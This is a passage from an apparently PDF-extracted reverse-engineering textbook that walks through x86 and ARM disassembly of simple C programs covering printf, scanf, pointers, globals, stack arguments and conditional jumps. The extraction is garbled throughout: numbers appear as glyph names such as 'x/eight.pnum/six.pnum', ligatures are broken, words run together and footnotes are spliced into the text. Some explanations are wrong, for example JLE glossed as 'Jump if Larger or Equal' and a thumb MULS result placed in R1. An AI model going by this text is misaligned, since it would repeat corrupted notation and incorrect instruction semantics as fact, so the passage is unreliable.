__text:00002958 80 80 BD E8 LDMFD SP!, {R7,PC}
Almost the same what we already figured out, with the exception of STMFA (Store Multiple Full Ascending)
instruction, it is synonym to STMIB (Store Multiple Increment Before) instruction. This instruction increasing SP
and only then writing next register value into memory, but not vice versa.
Another thing we easily spot is that instructions ostensibly located randomly. For instance, R0register value
is prepared in three places, at addresses 0x2918 ,0x2920 and0x2928 , when it would be possible to do it in one
single place. However, optimizing compiler has his own reasons about how to place instructions better. Usually,
processor attempts to execute instructions located side-by-side. For example, instructions like “MOVT R0, #0”
and“ADD R0, PC, R0” cannot be executed simultaneously, because they both modifying R0register. On the
other hand, “MOVT R0, #0” and“MOV R2, #4” instructions can be executed simultaneously because effects of
their execution are not conflicting with each other. Presumably, compiler tries to generate code in such way, where
it’s possible, of course.
Optimizing Xcode (LLVM): thumb-/two.pnum mode
__text:00002BA0 _printf_main2
__text:00002BA0
__text:00002BA0 var_1C = -0x1C
__text:00002BA0 var_18 = -0x18
__text:00002BA0 var_C = -0xC
__text:00002BA0
__text:00002BA0 80 B5 PUSH {R7,LR}
__text:00002BA2 6F 46 MOV R7, SP
__text:00002BA4 85 B0 SUB SP, SP, #0x14
__text:00002BA6 41 F2 D8 20 MOVW R0, #0x12D8
__text:00002BAA 4F F0 07 0C MOV.W R12, #7
__text:00002BAE C0 F2 00 00 MOVT.W R0, #0
__text:00002BB2 04 22 MOVS R2, #4
__text:00002BB4 78 44 ADD R0, PC ; char *
__text:00002BB6 06 23 MOVS R3, #6
__text:00002BB8 05 21 MOVS R1, #5
__text:00002BBA 0D F1 04 0E ADD.W LR, SP, #0x1C+var_18
__text:00002BBE 00 92 STR R2, [SP,#0x1C+var_1C]
__text:00002BC0 4F F0 08 09 MOV.W R9, #8
__text:00002BC4 8E E8 0A 10 STMIA.W LR, {R1,R3,R12}
/one.pnum/six.pnum
__text:00002BC8 01 21 MOVS R1, #1
__text:00002BCA 02 22 MOVS R2, #2
__text:00002BCC 03 23 MOVS R3, #3
__text:00002BCE CD F8 10 90 STR.W R9, [SP,#0x1C+var_C]
__text:00002BD2 01 F0 0A EA BLX _printf
__text:00002BD6 05 B0 ADD SP, SP, #0x14
__text:00002BD8 80 BD POP {R7,PC}
Almost the same as in previous example, with the exception that thumb-instructions are used there instead.
/one.pnum./three.pnum./four.pnum By the way
By the way, this difference between passing arguments in x/eight.pnum/six.pnum and ARM is a good illustration that CPU is not aware
of how arguments is passed to functions. It is also possible to create hypothetical compiler which is able to pass
arguments via some special structure not using stack at all.
/one.pnum/seven.pnum
/one.pnum./four.pnum scanf()
Now let’s use scanf().
int main()
{
int x;
printf ("Enter X:\n");
scanf ("%d", &x);
printf ("You entered %d...\n", x);
return 0;
};
OK, I agree, it is not clever to use scanf() today. But I wanted to illustrate passing pointer to int.
/one.pnum./four.pnum./one.pnum About pointers
It’s one of the most fundamental things in computer science. O/f_ten, large array, structure or object, it’s too costly
to pass to another function, while passing its address is much easier. More than that: if calling function should
modify something in that large array or structure, to return it as a whole is absurdical as well. So the most simple
thing to do is to pass an address of array or structure to function, and let it change it what need.
In C/C++ it’s just an address of some place in memory.
In x/eight.pnum/six.pnum, address is represented as /three.pnum/two.pnum-bit number (i.e., occupying /four.pnum bytes), while in x/eight.pnum/six.pnum-/six.pnum/four.pnum it’s /six.pnum/four.pnum-bit number
(occupying /eight.pnum bytes). By the way, that’s a reson of some people’s indignation related to switching to x/eight.pnum/six.pnum-/six.pnum/four.pnum — all
pointers on that architecture will require twice as more space.
With some effort, it’s possible to work only with untyped pointers, for example, standard function memcpy() ,
copying a block from one place in memory to another, takes /two.pnum pointers of void* type on input, because it’s not
possible to predict block type you would like to copy, and it’s not even important to know, only block size is im-
portant.
Also, pointers are widely used when function need to return more than one value (we will back to this in fu-
ture /one.pnum./seven.pnum). scanf() is just that case. In addition to the function’s need to show, how many values were read success-
fully, it also should to return all these values.
In C/C++ pointer type is needed only for type checking on compiling stage. Internally, in compiled code, there
are no information about pointers types.
/one.pnum./four.pnum./two.pnum x/eight.pnum/six.pnum
What we got a/f_ter compiling in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum:
CONST SEGMENT
$SG3831 DB ’Enter X:’, 0aH, 00H
ORG $+2
$SG3832 DB ’%d’, 00H
ORG $+1
$SG3833 DB ’You entered %d...’, 0aH, 00H
CONST ENDS
PUBLIC _main
EXTRN _scanf:PROC
EXTRN _printf:PROC
; Function compile flags: /Odtp
_TEXT SEGMENT
_x$ = -4 ; size = 4
_main PROC
push ebp
mov ebp, esp
push ecx
push OFFSET $SG3831
call _printf
/one.pnum/eight.pnum
add esp, 4
lea eax, DWORD PTR _x$[ebp]
push eax
push OFFSET $SG3832
call _scanf
add esp, 8
mov ecx, DWORD PTR _x$[ebp]
push ecx
push OFFSET $SG3833
call _printf
add esp, 8
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
_TEXT ENDS
Variablexis local.
C/C++ standard tell us it must be visible only in this function and not from any other place. Traditionally, local
variables are placed in the stack. Probably, there could be other ways, but in x/eight.pnum/six.pnum it is so.
Next a/f_ter function prologue instruction PUSH ECX is not for saving ECXstate (notice absence of corresponding
POP ECX at the function end).
In fact, this instruction just allocate /four.pnum bytes in stack for xvariable storage.
xwill be accessed with the assistance of _x$macro (it equals to -/four.pnum) and EBPregister pointing to current frame.
Over a span of function execution, EBPis pointing to current stack frame and it is possible to have an access to
local variables and function arguments via EBP+offset .
It is also possible to use ESP, but it’s o/f_ten changing and not very handy. So it can be said, EBPisfrozen state
ofESPat the moment of function execution start.
Function scanf() in our example has two arguments.
First is pointer to the string containing “%d” and second — address of variable x.
First of all, address of xis placed into EAXregister by lea eax, DWORD PTR _x$[ebp] instruction
LEAmeaning load effective address , but over a time it changed its primary application /two.pnum./one.pnum.
It can be said, LEAhere just placing to EAXsum ofEBPvalue and _x$macro.
It is the same as lea eax, [ebp-4] .
So, /four.pnum subtracting from EBPvalue and result is placed to EAX. And then value in EAXis pushing into stack and
scanf() is called.
A/f_ter that, printf() is called. First argument is pointer to string: “You entered %d...\n” .
Second argument is prepared as: mov ecx, [ebp-4] , this instruction placing to ECXnot address of xvariable
but its contents.
A/f_ter,ECXvalue is placing into stack and last printf() called.
Let’s try to compile this code in GCC /four.pnum./four.pnum./one.pnum under Linux:
main proc near
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 20h
mov [esp+20h+var_20], offset aEnterX ; "Enter X:"
call _puts
mov eax, offset aD ; "%d"
lea edx, [esp+20h+var_4]
mov [esp+20h+var_1C], edx
mov [esp+20h+var_20], eax
call ___isoc99_scanf
mov edx, [esp+20h+var_4]
/one.pnum/nine.pnum
mov eax, offset aYouEnteredD___ ; "You entered %d...\n"
mov [esp+20h+var_1C], edx
mov [esp+20h+var_20], eax
call _printf
mov eax, 0
leave
retn
main endp
GCC replaced first printf() call toputs() , it was already described /one.pnum./one.pnum./two.pnum why it was done.
As before — arguments are placed into stack by MOVinstruction.
/one.pnum./four.pnum./three.pnum ARM
Optimizing Keil + thumb mode
.text:00000042 scanf_main
.text:00000042
.text:00000042 var_8 = -8
.text:00000042
.text:00000042 08 B5 PUSH {R3,LR}
.text:00000044 A9 A0 ADR R0, aEnterX ; "Enter X:\n"
.text:00000046 06 F0 D3 F8 BL __2printf
.text:0000004A 69 46 MOV R1, SP
.text:0000004C AA A0 ADR R0, aD ; "%d"
.text:0000004E 06 F0 CD F8 BL __0scanf
.text:00000052 00 99 LDR R1, [SP,#8+var_8]
.text:00000054 A9 A0 ADR R0, aYouEnteredD___ ; "You entered %d...\n"
.text:00000056 06 F0 CB F8 BL __2printf
.text:0000005A 00 20 MOVS R0, #0
.text:0000005C 08 BD POP {R3,PC}
A pointer to int-typed variable shoud be passed to scanf() so it can return value via it. intis /three.pnum/two.pnum-bit value, so we
need /four.pnum bytes for storing it somewhere in memory, and it fits exactly in /three.pnum/two.pnum-bit regsiter. A place for local variable xis
allocated in stack and IDA /five.pnum named it var_/eight.pnum , however, it’s not necessary to allocate it, because, SPstack pointer is
already pointing to the place which may be used. So, SPstack pointer value is copied to R1register and, together
with format-string, passed into scanf() . Later, with the help of LDRinstruction, this value is moved from stack
intoR1register in order to be passed into printf() .
Examples compiled for ARM-mode and also examples compiled with Xcode LLVM are not differ significally from
what we saw here, so they are omitted.
/one.pnum./four.pnum./four.pnum Global variables
x/eight.pnum/six.pnum
What ifxvariable from previous example will not be local but global variable? Then it will be accessible from any
place but not only from function body. It is not very good programming practice, but for the sake of experiment
we could do this.
_DATA SEGMENT
COMM _x:DWORD
$SG2456 DB ’Enter X:’, 0aH, 00H
ORG $+2
$SG2457 DB ’%d’, 00H
ORG $+1
$SG2458 DB ’You entered %d...’, 0aH, 00H
_DATA ENDS
PUBLIC _main
EXTRN _scanf:PROC
EXTRN _printf:PROC
; Function compile flags: /Odtp
_TEXT SEGMENT
/two.pnum/zero.pnum
_main PROC
push ebp
mov ebp, esp
push OFFSET $SG2456
call _printf
add esp, 4
push OFFSET _x
push OFFSET $SG2457
call _scanf
add esp, 8
mov eax, DWORD PTR _x
push eax
push OFFSET $SG2458
call _printf
add esp, 8
xor eax, eax
pop ebp
ret 0
_main ENDP
_TEXT ENDS
Nowxvariable is defined in _DATA segment. Memory in local stack is not allocated anymore. All accesses
to it are not via stack but directly to process memory. Its value is not defined. This mean that memory will be
allocated by operation system, but not compiler, neither operation system will not take care about its initial value
at the moment of main() function start. As experiment, try to declare large array and see what will it contain a/f_ter
program loading.
Now let’s assign value to variable explicitly:
int x=10; // default value
We got:
_DATA SEGMENT
_x DD 0aH
...
Here we see value /zero.pnumxA of DWORD type (DD meaning DWORD = /three.pnum/two.pnum bit).
If you will open compiled .exe in IDA /five.pnum, you will see xplaced at the beginning of _DATA segment, and a/f_ter you’ll
see text strings.
If you will open compiled .exe in IDA /five.pnum from previous example where xvalue is not defined, you’ll see something
like this:
.data:0040FA80 _x dd ? ; DATA XREF: _main+10
.data:0040FA80 ; _main+22
.data:0040FA84 dword_40FA84 dd ? ; DATA XREF: _memset+1E
.data:0040FA84 ; unknown_libname_1+28
.data:0040FA88 dword_40FA88 dd ? ; DATA XREF: ___sbh_find_block+5
.data:0040FA88 ; ___sbh_free_block+2BC
.data:0040FA8C ; LPVOID lpMem
.data:0040FA8C lpMem dd ? ; DATA XREF: ___sbh_find_block+B
.data:0040FA8C ; ___sbh_free_block+2CA
.data:0040FA90 dword_40FA90 dd ? ; DATA XREF: _V6_HeapAlloc+13
.data:0040FA90 ; __calloc_impl+72
.data:0040FA94 dword_40FA94 dd ? ; DATA XREF: ___sbh_free_block+2FE
_xmarked as ?among another variables not required to be initialized. This mean that a/f_ter loading .exe to
memory, place for all these variables will be allocated and some random garbage will be here. But in .exe file these
not initialized variables are not occupy anything. It is suitable for large arrays, for example.
It is almost the same in Linux, except segment names and properties: not initialized variables are located in
_bss segment. In ELF/three.pnum/seven.pnumfile format this segment has such attributes:
/three.pnum/seven.pnumExecutable file format widely used in *NIX system including Linux
/two.pnum/one.pnum
; Segment type: Uninitialized
; Segment permissions: Read/Write
If to assign some value to variable, e.g. 10, it will be placed in _data segment, this is segment with such at-
tributes:
; Segment type: Pure data
; Segment permissions: Read/Write
ARM: Optimizing Keil + thumb mode
.text:00000000 ; Segment type: Pure code
.text:00000000 AREA .text, CODE
...
.text:00000000 main
.text:00000000 PUSH {R4,LR}
.text:00000002 ADR R0, aEnterX ; "Enter X:\n"
.text:00000004 BL __2printf
.text:00000008 LDR R1, =x
.text:0000000A ADR R0, aD ; "%d"
.text:0000000C BL __0scanf
.text:00000010 LDR R0, =x
.text:00000012 LDR R1, [R0]
.text:00000014 ADR R0, aYouEnteredD___ ; "You entered %d...\n"
.text:00000016 BL __2printf
.text:0000001A MOVS R0, #0
.text:0000001C POP {R4,PC}
...
.text:00000020 aEnterX DCB "Enter X:",0xA,0 ; DATA XREF: main+2
.text:0000002A DCB 0
.text:0000002B DCB 0
.text:0000002C off_2C DCD x ; DATA XREF: main+8
.text:0000002C ; main+10
.text:00000030 aD DCB "%d",0 ; DATA XREF: main+A
.text:00000033 DCB 0
.text:00000034 aYouEnteredD___ DCB "You entered %d...",0xA,0 ; DATA XREF: main+14
.text:00000047 DCB 0
.text:00000047 ; .text ends
.text:00000047
...
.data:00000048 ; Segment type: Pure data
.data:00000048 AREA .data, DATA
.data:00000048 ; ORG 0x48
.data:00000048 EXPORT x
.data:00000048 x DCD 0xA ; DATA XREF: main+8
.data:00000048 ; main+10
.data:00000048 ; .data ends
So,xvariable is now global and it’s localted, and, somehow, it’s now located in other segment, namely data
segment ( .data ). One could ask, why text strings are located in code segment ( .text) andxcan be located right
here? Because, this is variable, and by its definition, it can be changed. And probably, can be changed very o/f_ten.
Segment of code not infrequently can be located in microcontroller ROM (remember, we now deal with embed-
ded microelectronics, and memory scarcity is common here), and changeable variables — in RAM. It’s not very
economically to store constant variables in RAM when one have ROM.
Onwards, we see, in code segment, a pointer to x(off_2C ) variable, and all operations with variable occured
via this pointer. This is because xvariable can be located somewhere far from this code fragment, so its address
should be saved somewhere in close proximity to the code. LDRinstruction in thumb mode can address only
variable in range of /one.pnum/zero.pnum/two.pnum/zero.pnum bytes from the place where it’s located. Same instruction in ARM-mode — variables in
range±4095 bytes, this, address of xvariable should be located somewhere in close proximity, because, there are
no guarantee that linker will able to place this variable near the code, it could be even in other memory chip!
/two.pnum/two.pnum
One more thing: if variable will be declared as const , Keil compiler will allocate it in .constdata segment.
Perhaps, therea/f_ter, linker will able to place this segment in ROM too, along with code segment.
/one.pnum./four.pnum./five.pnum scanf() result checking
x/eight.pnum/six.pnum
As I noticed before, it is slightly old-fashioned to use scanf() today. But if we have to, we need at least check if
scanf() finished correctly without error.
int main()
{
int x;
printf ("Enter X:\n");
if (scanf ("%d", &x)==1)
printf ("You entered %d...\n", x);
else
printf ("What you entered? Huh?\n");
return 0;
};
By standard, scanf()/three.pnum/eight.pnumfunction returning number of fields it successfully read.
In our case, if everything went fine and user entered some number, scanf() will return /one.pnum or /zero.pnum or EOF in case of
error.
I added C code for scanf() result checking and printing error message in case of error.
What we got in assembly language (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
; Line 8
lea eax, DWORD PTR _x$[ebp]
push eax
push OFFSET $SG3833 ; ’%d’, 00H
call _scanf
add esp, 8
cmp eax, 1
jne SHORT $LN2@main
; Line 9
mov ecx, DWORD PTR _x$[ebp]
push ecx
push OFFSET $SG3834 ; ’You entered %d...’, 0aH, 00H
call _printf
add esp, 8
; Line 10
jmp SHORT $LN1@main
$LN2@main:
; Line 11
push OFFSET $SG3836 ; ’What you entered? Huh?’, 0aH, 00H
call _printf
add esp, 4
$LN1@main:
; Line 13
xor eax, eax
Caller function ( main() ) should have access to result of callee function ( scanf() ), so callee leave this value in
EAXregister.
A/f_ter, we check it using instruction CMP EAX, 1 (CoMPare ), in other words, we compare value in EAXwith /one.pnum.
JNEconditional jump follows CMPinstruction. JNEmean Jump if Not Equal .
So, ifEAXvalue not equals to /one.pnum, then the processor will pass execution to the address mentioned in operand
ofJNE, in our case it is $LN2@main . Passing control to this address, microprocesor will execute function printf()
with argument “What you entered? Huh?” . But if everything is fine, conditional jump will not be taken, and
anotherprintf() call will be executed, with two arguments: ’You entered %d...’ and value of variable x.
/three.pnum/eight.pnumMSDN: scanf, wscanf
/two.pnum/three.pnum
Because second subsequent printf() not needed to be executed, there are JMPa/f_ter (unconditional jump)
it will pass control to the place a/f_ter second printf() and before XOR EAX, EAX instruction, which implement
return 0 .
So, it can be said that most o/f_ten, comparing some value with another is implemented by CMP/Jccinstructions
pair, where cciscondition code .CMPcomparing two values and set processor flags/three.pnum/nine.pnum.Jcccheck flags needed to be
checked and pass control to mentioned address (or not pass).
But in fact, this could be perceived paradoxial, but CMPinstruction is in fact SUB(subtract). All arithmetic in-
structions set processor flags too, not only CMP. If we compare /one.pnum and /one.pnum, 1−1will be zero in result, ZFflag will
be set (meaning that last result was zero). There are no any other circumstances when it’s possible except when
operands are equal. JNEchecks only ZFflag and jumping only if it is not set. JNEis in fact a synonym of JNZ(Jump
if Not Zero ) instruction. Assembler translating both JNEandJNZinstructions into one single opcode. So, CMPcan
be replaced to SUBand almost everything will be fine, but the difference is in that SUBalter value at first operand.
CMPis“SUB without saving result” .
Code generated by GCC /four.pnum./four.pnum./one.pnum in Linux is almost the same, except differences we already considered.
ARM: Optimizing Keil + thumb mode
Listing /one.pnum./one.pnum/two.pnum: Optimizing Keil + thumb mode
var_8 = -8
PUSH {R3,LR}
ADR R0, aEnterX ; "Enter X:\n"
BL __2printf
MOV R1, SP
ADR R0, aD ; "%d"
BL __0scanf
CMP R0, #1
BEQ loc_1E
ADR R0, aWhatYouEntered ; "What you entered? Huh?\n"
BL __2printf
loc_1A ; CODE XREF: main+26
MOVS R0, #0
POP {R3,PC}
loc_1E ; CODE XREF: main+12
LDR R1, [SP,#8+var_8]
ADR R0, aYouEnteredD___ ; "You entered %d...\n"
BL __2printf
B loc_1A
New instructions here are CMPandBEQ.
CMPis similar to the x/eight.pnum/six.pnum instruction, it subtracts one argument from another and save flags.
BEQ(Branch Equal ) is jumping to another address if operands while comparing were equal to each other, or, if
result of last computation was zero, or if Z flag is 1. Same thing as JZin x/eight.pnum/six.pnum.
Everything else is simple: execution flow is forking into two branches, then the branches are converging at the
place where 0is written into R0, as a value returned from the function, and then function finishing.
/three.pnum/nine.pnumAbout x/eight.pnum/six.pnum flags, see also: http://en.wikipedia.org/wiki/FLAGS_register_(computing) .
/two.pnum/four.pnum
/one.pnum./five.pnum Passing arguments via stack
Now we figured out that caller function passing arguments to callee via stack. But how callee/four.pnum/zero.pnumaccess them?
#include <stdio.h>
int f (int a, int b, int c)
{
return a*b+c;
};
int main()
{
printf ("%d\n", f(1, 2, 3));
return 0;
};
/one.pnum./five.pnum./one.pnum x/eight.pnum/six.pnum
What we have a/f_ter compilation (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum Express):
Listing /one.pnum./one.pnum/three.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum Express
_TEXT SEGMENT
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
_c$ = 16 ; size = 4
_f PROC
; File c:\...\1.c
; Line 4
push ebp
mov ebp, esp
; Line 5
mov eax, DWORD PTR _a$[ebp]
imul eax, DWORD PTR _b$[ebp]
add eax, DWORD PTR _c$[ebp]
; Line 6
pop ebp
ret 0
_f ENDP
_main PROC
; Line 9
push ebp
mov ebp, esp
; Line 10
push 3
push 2
push 1
call _f
add esp, 12 ; 0000000cH
push eax
push OFFSET $SG2463 ; ’%d’, 0aH, 00H
call _printf
add esp, 8
; Line 11
xor eax, eax
; Line 12
pop ebp
ret 0
_main ENDP
What we see is that /three.pnum numbers are pushing to stack in function main() andf(int,int,int) is called then.
Argument access inside f()is organized with help of macros like: _a$ = 8 , in the same way as local variables
/four.pnum/zero.pnumfunction being called
/two.pnum/five.pnum
accessed, but difference in that these offsets are positive (addressed with plus sign). So, adding _a$macro to EBP
register value, outer side of stack frame is addressed.
Thenavalue is stored into EAX. A/f_terIMUL instruction execution, EAXvalue is product/four.pnum/one.pnumofEAXand what is
stored in _b. A/f_terIMUL execution, ADDis summing EAXand what is stored in _c. Value in EAXis not needed to be
moved: it is already in place it need. Now return to caller — it will take value from EAXand used it as printf()
argument.
Let’s compile the same in GCC /four.pnum./four.pnum./one.pnum:
Listing /one.pnum./one.pnum/four.pnum: GCC /four.pnum./four.pnum./one.pnum
public f
f proc near ; CODE XREF: main+20
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
imul eax, [ebp+arg_4]
add eax, [ebp+arg_8]
pop ebp
retn
f endp
public main
main proc near ; DATA XREF: _start+17
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 10h ; char *
mov [esp+10h+var_8], 3
mov [esp+10h+var_C], 2
mov [esp+10h+var_10], 1
call f
mov edx, offset aD ; "%d\n"
mov [esp+10h+var_C], eax
mov [esp+10h+var_10], edx
call _printf
mov eax, 0
leave
retn
main endp
Almost the same result.
/one.pnum./five.pnum./two.pnum ARM
Non-optimizing Keil + ARM mode
.text:000000A4 00 30 A0 E1 MOV R3, R0
.text:000000A8 93 21 20 E0 MLA R0, R3, R1, R2
.text:000000AC 1E FF 2F E1 BX LR
...
.text:000000B0 main
.text:000000B0 10 40 2D E9 STMFD SP!, {R4,LR}
/four.pnum/one.pnumresult of multiplication
/two.pnum/six.pnum
.text:000000B4 03 20 A0 E3 MOV R2, #3
.text:000000B8 02 10 A0 E3 MOV R1, #2
.text:000000BC 01 00 A0 E3 MOV R0, #1
.text:000000C0 F7 FF FF EB BL f
.text:000000C4 00 40 A0 E1 MOV R4, R0
.text:000000C8 04 10 A0 E1 MOV R1, R4
.text:000000CC 5A 0F 8F E2 ADR R0, aD_0 ; "%d\n"
.text:000000D0 E3 18 00 EB BL __2printf
.text:000000D4 00 00 A0 E3 MOV R0, #0
.text:000000D8 10 80 BD E8 LDMFD SP!, {R4,PC}
Inmain() function, two other functions are simply called, and three values are passed to the first one ( f).
As I mentioned before, in ARM, first /four.pnum values are usually passed in first /four.pnum registers ( R0-R3).
ffunction, as it seems, use first /three.pnum registers ( R0-R2) as arguments.
MLA(Multiply Accumulate ) instruction multiplicates two first operands ( R3andR1), adds third operand ( R2) to
product and places result into zeroth operand ( R0), via which, by standard, values are returned from functions.
Multiplication and addition at once/four.pnum/two.pnum(Fused multiply–add ) is very useful operation, by the way, there are no
such instruction in x/eight.pnum/six.pnum, if not to count new FMA-instruction/four.pnum/three.pnumin SIMD.
The very first MOV R3, R0 , instruction, apparently, redundant (single MLAinstruction could be used here in-
stead), compiler wasn’t optimized it, because, this is non-optimizing compilation.
BXinstruction returns control to the address stored in LRand, if need, switches processor mode from thumb
to ARM or vice versa. This can be necessary because, as we can see, ffunction is not aware, from which code it
may be called, from ARM or thumb. This, if it will be called from thumb code, BXwill not only return control to
the calling function, but also will switch processor mode to thumb mode. Or not switch, if the function was called
from ARM code.
Optimizing Keil + ARM mode
.text:00000098 f
.text:00000098 91 20 20 E0 MLA R0, R1, R0, R2
.text:0000009C 1E FF 2F E1 BX LR
And here is ffunction compiled by Keil compiler in full optimization mode ( -O3).MOVinstruction was optimized
and nowMLAuses all input registers and place result into R0, exactly where calling function will read it and use.
Optimizing Keil + thumb mode
.text:0000005E 48 43 MULS R0, R1
.text:00000060 80 18 ADDS R0, R0, R2
.text:00000062 70 47 BX LR
MLAinstruction is not available in thumb mode, so, compiler generates the code doing these two operations
separately. First MULS instruction multiply R0byR1leaving result in R1. Second ( ADDS ) instruction adds result and
R2leaving result in R0.
/four.pnum/two.pnumwikipedia: Multiply–accumulate operation
/four.pnum/three.pnumhttps://en.wikipedia.org/wiki/FMA_instruction_set
/two.pnum/seven.pnum
/one.pnum./six.pnum One more word about results returning.
As of x/eight.pnum/six.pnum, function execution result is usually returned/four.pnum/four.pnuminEAXregister. If it’s byte type or character ( char ) — then
in lowest register EAXpart —AL. If function returning float number, FPU register ST(0) will be used instead. In
ARM, result is usually returned in R/zero.pnum register.
That is why old C compilers can’t create functions capable of returning something not fitting in one register
(usually type int), but if one need it, one should return information via pointers passed in function arguments.
Now it is possible, to return, let’s say, whole structure, but its still not very popular. If function should return a
large structure, caller must allocate it and pass pointer to it via first argument, hiddenly and transparently for
programmer. That is almost the same as to pass pointer in first argument manually, but compiler hide this.
Small example:
struct s
{
int a;
int b;
int c;
};
struct s get_some_values (int a)
{
struct s rt;
rt.a=a+1;
rt.b=a+2;
rt.c=a+3;
return rt;
};
...what we got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum /Ox):
$T3853 = 8 ; size = 4
_a$ = 12 ; size = 4
?get_some_values@@YA?AUs@@H@Z PROC ; get_some_values
mov ecx, DWORD PTR _a$[esp-4]
mov eax, DWORD PTR $T3853[esp-4]
lea edx, DWORD PTR [ecx+1]
mov DWORD PTR [eax], edx
lea edx, DWORD PTR [ecx+2]
add ecx, 3
mov DWORD PTR [eax+4], edx
mov DWORD PTR [eax+8], ecx
ret 0
?get_some_values@@YA?AUs@@H@Z ENDP ; get_some_values
Macro name for internal variable passing pointer to structure is $T3853 here.
/four.pnum/four.pnumSee also: MSDN: Return Values (C++)
/two.pnum/eight.pnum
/one.pnum./seven.pnum Pointers
Pointers are o/f_ten used to return values from function (recall scanf() case /one.pnum./four.pnum). For example, when function should
return two values:
void f1 (int x, int y, int *sum, int *product)
{
*sum=x+y;
*product=x*y;
};
void main()
{
int sum, product;
f1(123, 456, &sum, &product);
printf ("sum=%d, product=%d\n", sum, product);
};
This compiling into:
Listing /one.pnum./one.pnum/five.pnum: Optimizing MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
CONST SEGMENT
$SG3863 DB ’sum=%d, product=%d’, 0aH, 00H
$SG3864 DB ’sum=%d, product=%d’, 0aH, 00H
CONST ENDS
_TEXT SEGMENT
_x$ = 8 ; size = 4
_y$ = 12 ; size = 4
_sum$ = 16 ; size = 4
_product$ = 20 ; size = 4
f1 PROC ; f1
mov ecx, DWORD PTR _y$[esp-4]
mov eax, DWORD PTR _x$[esp-4]
lea edx, DWORD PTR [eax+ecx]
imul eax, ecx
mov ecx, DWORD PTR _product$[esp-4]
push esi
mov esi, DWORD PTR _sum$[esp]
mov DWORD PTR [esi], edx
mov DWORD PTR [ecx], eax
pop esi
ret 0
f1 ENDP ; f1
_product$ = -8 ; size = 4
_sum$ = -4 ; size = 4
_main PROC
sub esp, 8
lea eax, DWORD PTR _product$[esp+8]
push eax
lea ecx, DWORD PTR _sum$[esp+12]
push ecx
push 456 ; 000001c8H
push 123 ; 0000007bH
call f1 ; f1
mov edx, DWORD PTR _product$[esp+24]
mov eax, DWORD PTR _sum$[esp+24]
push edx
push eax
push OFFSET $SG3863
call _printf
...
/two.pnum/nine.pnum
/one.pnum./seven.pnum./one.pnum C++ references
In C++, references are pointers as well, but they are called safe, because it’s harder to make a mistake while working
with them [ISO/one.pnum/three.pnum, /eight.pnum./three.pnum./two.pnum]. For example, reference should be always be pointing to the object of corresponding type
and can’t be NULL [Cli, /eight.pnum./six.pnum]. Even more, reference cannot be changed, it’s not possible to point to to another object
(reseat) [Cli, /eight.pnum./five.pnum].
If we will try to change are example to use references instead of pointers:
void f2 (int x, int y, int & sum, int & product)
{
sum=x+y;
product=x*y;
};
Then we’ll figure out that compiled code is just the same:
Listing /one.pnum./one.pnum/six.pnum: Optimizing MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_x$ = 8 ; size = 4
_y$ = 12 ; size = 4
_sum$ = 16 ; size = 4
_product$ = 20 ; size = 4
?f2@@YAXHHAAH0@Z PROC ; f2
mov ecx, DWORD PTR _y$[esp-4]
mov eax, DWORD PTR _x$[esp-4]
lea edx, DWORD PTR [eax+ecx]
imul eax, ecx
mov ecx, DWORD PTR _product$[esp-4]
push esi
mov esi, DWORD PTR _sum$[esp]
mov DWORD PTR [esi], edx
mov DWORD PTR [ecx], eax
pop esi
ret 0
?f2@@YAXHHAAH0@Z ENDP ; f2
(A reason why C++ functions has such strange names, will be described later /one.pnum./one.pnum/seven.pnum./one.pnum.)
/three.pnum/zero.pnum
/one.pnum./eight.pnum Conditional jumps
Now about conditional jumps.
void f_signed (int a, int b)
{
if (a>b)
printf ("a>b\n");
if (a==b)
printf ("a==b\n");
if (a<b)
printf ("a<b\n");
};
void f_unsigned (unsigned int a, unsigned int b)
{
if (a>b)
printf ("a>b\n");
if (a==b)
printf ("a==b\n");
if (a<b)
printf ("a<b\n");
};
int main()
{
f_signed(1, 2);
f_unsigned(1, 2);
return 0;
};
/one.pnum./eight.pnum./one.pnum x/eight.pnum/six.pnum
x/eight.pnum/six.pnum + MSVC
What we have in f_signed() function:
Listing /one.pnum./one.pnum/seven.pnum: MSVC
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
_f_signed PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _a$[ebp]
cmp eax, DWORD PTR _b$[ebp]
jle SHORT $LN3@f_signed
push OFFSET $SG737 ; ’a>b’, 0aH, 00H
call _printf
add esp, 4
$LN3@f_signed:
mov ecx, DWORD PTR _a$[ebp]
cmp ecx, DWORD PTR _b$[ebp]
jne SHORT $LN2@f_signed
push OFFSET $SG739 ; ’a==b’, 0aH, 00H
call _printf
add esp, 4
$LN2@f_signed:
mov edx, DWORD PTR _a$[ebp]
cmp edx, DWORD PTR _b$[ebp]
jge SHORT $LN4@f_signed
push OFFSET $SG741 ; ’a<b’, 0aH, 00H
call _printf
add esp, 4
$LN4@f_signed:
/three.pnum/one.pnum
pop ebp
ret 0
_f_signed ENDP
First instruction JLEmean Jump if Larger or Equal . In other words, if second operand is larger than first or
equal, control flow will be passed to address or label mentioned in instruction. But if this condition will not trigger
(second operand less than first), control flow will not be altered and first printf() will be called. The second
check isJNE:Jump if Not Equal . Control flow will not altered if operands are equals to each other. The third check
isJGE:Jump if Greater or Equal — jump if second operand is larger than first or they are equals to each other. By
the way, if all three conditional jumps are triggered, no printf() will be called whatsoever. But, without special
intervention, it is nearly impossible.
f_unsigned() function is the same, with the exception that JBEandJAEinstructions are used here instead of
JLEandJGE, see below about it:
GCC
GCC /four.pnum./four.pnum./one.pnum produce almost the same code, but with puts() /one.pnum./one.pnum./two.pnum instead of printf() .
Now let’s take a look of f_unsigned() produced by GCC:
Listing /one.pnum./one.pnum/eight.pnum: GCC
.globl f_unsigned
